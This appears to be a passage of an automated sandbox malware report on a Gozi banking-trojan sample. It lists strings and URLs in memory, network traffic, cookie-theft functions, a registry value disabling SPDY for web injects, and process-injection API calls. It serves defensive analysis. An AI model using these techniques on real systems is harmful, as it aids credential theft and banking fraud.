Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crlf
Source: explorer.exe, 00000003.00000000.1514376422.05310000.00000008.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000003.00000000.1509319448.03C30000.00000008.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000003.00000000.1514376422.05310000.00000008.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000003.00000000.1502801306.01D30000.00000008.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.1512679035.0464D000.00000004.sdmp	String found in binary or memory: http://www.%s.comSoftware
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: C60A.bin.3.dr	String found in binary or memory: http://www.alexisisaac.net
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1512922741.046ED000.00000004.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: C60A.bin.3.dr	String found in binary or memory: https://java.sun.com
Source: explorer.exe, 00000003.00000000.1499760778.004AD000.00000004.sdmp, C60A.bin.3.dr	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000003.00000000.1499760778.004AD000.00000004.sdmp, C60A.bin.3.dr	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.1499760778.004AD000.00000004.sdmp, C60A.bin.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/43.0.1/releasenotes

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 49217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49217

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\explorer.exe	Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff		2_2_01541E2E
Source: C:\Windows\explorer.exe	Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie		2_2_01541E2E

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Jump to behavior

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

0_1_004060FB

System Summary:

Contains functionality to call native functions

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00402C11 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,	0_2_00402C11
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00402732 memset,memcpy,NtSetContextThread,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_00402732
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00402C3D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00402C3D
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00402AD0 memset,NtQueryInformationProcess,	0_2_00402AD0
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_004032D4 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,	0_2_004032D4
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_004039E1 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,	0_2_004039E1
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00402BE5 NtReadVirtualMemory,NtReadVirtualMemory,	0_2_00402BE5
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00403188 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,	0_2_00403188
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_004039A2 NtMapViewOfSection,RtlNtStatusToDosError,	0_2_004039A2
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00404425 NtQueryVirtualMemory,	0_2_00404425
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00402BC4 NtGetContextThread,RtlNtStatusToDosError,	0_2_00402BC4
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00402B78 _memmove,NtWriteVirtualMemory,	0_1_00402B78
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00402C18 NtWriteVirtualMemory,	0_1_00402C18
Source: C:\Windows\explorer.exe	Code function: 2_2_0156B1C6 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,	2_2_0156B1C6
